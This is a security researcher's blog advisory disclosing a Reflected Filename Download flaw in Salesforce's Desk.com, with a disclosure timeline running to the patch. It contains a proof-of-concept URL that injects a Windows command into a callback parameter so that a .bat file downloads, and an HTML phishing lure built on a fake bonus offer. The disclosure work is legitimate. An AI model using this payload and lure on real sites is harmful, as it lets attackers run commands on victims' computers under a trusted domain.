David Sopas – Web Security Researcher

August 3, 2015 at 8:01 pm

Desk.com Reflected Filename Download

Desk.com Reflected Filename Download

Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?

Many big companies choose Desk.com to manage their support system. You can see a few names like:

  • Mcafee
  • Asana
  • AddThis
  • Disqus
  • ShareThis
  • Smugmug
  • Soundcloud
  • Gawker
  • Braintreepayments

I found a Reflected Filename Download on Desk.com system which is a highly critical vulnerability and could lead to millions of users affected.
The problem is located on Desk.com and affected all the clients that used their application.

Proof-of-Concept:

https://support.desk_com_client.com/customer/portal/articles/autocomplete.bat?&term=calimdshd&callback=||start%20chrome%20websegura.net/malware.htm||

This PoC – downloads a file called autocomplete.bat which executes a chrome windows with a websegura.net/malware.htm page. It’s not malware it’s just text.

I tested under latest versions of Google Chrome, Firefox and Opera. All of them download the file autocomplete.bat with my injected Windows command.

When the victim visits this site it automatically downloads the file coming from the client servers.

chrome_rfd

So a possible attack scenario will be:

  1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (desk.com client site) downloads it
  3. Victim runs the file and his computer gets hijacked

To the victim, the entire process looks like a file is offered for download from desk.com client original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining trust of victims. This could be the right online weapon.

After submiting the security report to Desk.com and some of the biggest clients, Desk.com/Salesforce decided in 19 Jun that was fixed.
I re-tested and told them that it was still possible to hack their system.

In Internet Explorer 8 and 9 it’s still possible to automatically download the file with the payload and in other browsers you can use HTML5 download attribute to trick victims:

<div align="center"><a href="<a href="https://support.desk_com_client.com/customer/portal/articles/autocomplete.bat?&term=calimdshd&callback=%7C%7Cstart%20chrome%20websegura.net/malware.htm%7C%7C" target="_blank">https://support.desk_<wbr />com_client.com/customer/<wbr />portal/articles/autocomplete.<wbr />bat?&term=calimdshd&callback=|<wbr />|start%20chrome%20websegura.<wbr />net/malware.htm||</a>" download="autocomplete.bat"><<wbr />img src="<a href="http://image_with_the_client_logo.com/logo.jpg" target="_blank">http://image_with_the_<wbr />client_logo.com/logo.jpg</a>" border="0" /></a><br /><h1>Free $25 bonus signup</h1></div>

If the victim clicks on the logo it will asks for the download supposedly present in the desk_com_client.com creating a false feeling of trust to the victim.

Desk.com/Salesforce decided to not consider these last issues as a threat:

The reason IE 8/9 downloads the payload as an attachment instead of rendering it in the browser is because IE treats it as invalid syntax Javascript.
(…)

After a couple of days Salesforce decided to fix this vulnerability bypass:

Trust is our #1 value and we take security related issues very seriously.
I agree that this is a vulnerability and it needs to be addressed. I will have my team work on a fix ASAP

And this is how I helped one of the most highly valued American cloud computing companies with a market capitalization of $50 billion to fix a critical security issue.

Timeline:
25 May 2015 – Reported the issue to Braintreepayments (fixed the issue on their side), Mcafee (fixed the issue on their side) and Soundcloud
26 May 2015 – Reported the issue to Woobox, Gawker and Desk
27 May 2015 – Desk passed to the enginneers to fix the issue
03 Jun 2015 – Asked from an update from Desk which they report that the developing team fixed the bug and QA is verifying the fix now
15 Jun 2015 – Asked from an update from Desk
18 Jun 2015 – After some attempts to contact Azumio I submited the issue to them which they sent to Desk
19 Jun 2015 – Desk reported the issue was fixed
01 Jul 2015 – I reported the issue is not properly fixed. Sent the details about it
06 Jul 2015 – Desk reported the second report is not really a security issue
07 Jul 2015 – I sent a online proof-of-concept to Desk showing that the issue is not fixed
10 Jul 2015 – Desk won’t fix this second issue I sent
03 Aug 2015 – Desk decided to fix the second issue and everything is patched
04 Aug 2015 – Full disclosure

0 likes Advisories # , ,
Share: / / /

Leave a Reply

Your email address will not be published. Required fields are marked *